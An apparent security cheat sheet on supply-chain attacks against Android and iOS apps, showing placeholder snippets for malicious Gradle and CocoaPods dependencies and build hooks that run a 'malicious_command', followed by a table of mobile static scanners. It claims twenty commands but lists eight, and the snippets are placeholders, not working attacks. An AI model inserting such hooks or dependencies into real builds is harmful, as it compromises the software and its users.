Inadequate supply chain security can lead to various attacks on Android and iOS applications, compromising the integrity and security of the software distribution process. Here are the top 20 commands for potential attacks related to inadequate supply chain security:
Android:
Dependency Hijacking (Android):
- Command: Replace or inject malicious dependencies into the project.
implementation 'com.example:malicious-library:1.0.0'
Malicious SDK Integration (Android):
- Command: Integrate a malicious SDK into the application.
implementation 'com.example:malicious-sdk:1.0.0'
Compromised Build Systems (Android):
- Command: Compromise build systems to inject malicious code during the build process.
echo "echo 'Malicious code executed!'" >> build.gradle
Code Injection via Build Scripts (Android):
- Command: Inject malicious code into build scripts to modify the application behavior.
exec {
commandLine 'bash', '-c', 'malicious_command'
}
iOS:
Dependency Hijacking (iOS):
- Command: Replace or inject malicious dependencies into the project
pod 'MaliciousLibrary'
Malicious Framework Integration (iOS):
- Command: Integrate a malicious framework into the application.
target 'MyApp' do
pod 'MaliciousFramework'
end
Compromised Build Systems (iOS):
- Command: Compromise build systems to inject malicious code during the build process.
echo "echo 'Malicious code executed!'" >> Podfile
Code Injection via Build Scripts (iOS):
- Command: Inject malicious code into build scripts to modify the application behavior.
post_install do |installer|
system 'malicious_command'
end
Static Scanner
ID | Tool | Usage Features | Popularity |
1 | MobSF (Mobile Security Framework) | Static and dynamic analysis, API testing, SSL/TLS verification, data storage security checks, and more. | High |
2 | QARK (Quick Android Review Kit) | Static analysis for Android applications, vulnerability detection, insecure logging, cryptography issues, and more. | High |
3 | AndroBugs Framework | Static analysis tool for Android applications, identifying security vulnerabilities such as SQL injection, insecure data storage, and more. | Medium |
4 | Appknox | Automated security testing for Android and iOS apps, identifying vulnerabilities like OWASP Top 10, insecure data storage, and more. | Medium |
5 | Checkmarx | Static application security testing (SAST), identifying security vulnerabilities in code, including OWASP Top 10, insecure data storage, and more. | High |
6 | Veracode Mobile Security Testing | Automated security testing for Android and iOS applications, including static and dynamic analysis, identifying vulnerabilities, and more. | High |
7 | NowSecure Lab | Automated mobile app security testing, identifying vulnerabilities, insecure data storage, SSL/TLS issues, and more. | Medium |
8 | Fortify Static Code Analyzer | Static analysis tool for identifying security vulnerabilities in code, including OWASP Top 10, insecure data storage, and more. | High |
9 | Kryptowire | Automated security testing for Android and iOS applications, including static and dynamic analysis, identifying vulnerabilities, and more. | Medium |
10 | ZAP (Zed Attack Proxy) | Dynamic application security testing (DAST), identifying vulnerabilities, SSL/TLS issues, insecure data storage, and more. | High |
Resources
SANS FOR585
SANS GMOB